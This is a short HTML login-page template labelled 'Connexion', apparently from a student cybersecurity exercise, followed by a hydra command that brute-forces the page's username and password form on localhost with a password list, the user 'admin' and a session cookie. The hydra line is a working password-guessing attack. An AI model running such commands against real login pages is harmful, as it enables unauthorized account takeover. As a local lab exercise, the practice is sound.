{% include 'header.html' %}
<!DOCTYPE html>
<html>
<body>

<h2>Connexion</h2>

<form method="post">
  <div class="container">
    <label for="username"><b>username</b></label>
    <input type="text" placeholder="Enter Username" name="username" required>

    <label for="password"><b>password</b></label>
    <input type="password" placeholder="Enter Password" name="password" required>

    <button type="submit">Login</button>
  </div>
</form>

</body>
</html>


hydra -f -l admin -P /home/apprenant/Documents/01projet_python/DevIA_Roubaix/cybersecure/password.txt 127.0.0.1 http-get-form "/login/:username=^USER^&Password=^PASS^:F=mdp ou username incorrect:H=Cookie:csrftoken=tHFqFrQj9KBlQJ54LRlrXgJUa1EnreEY" -V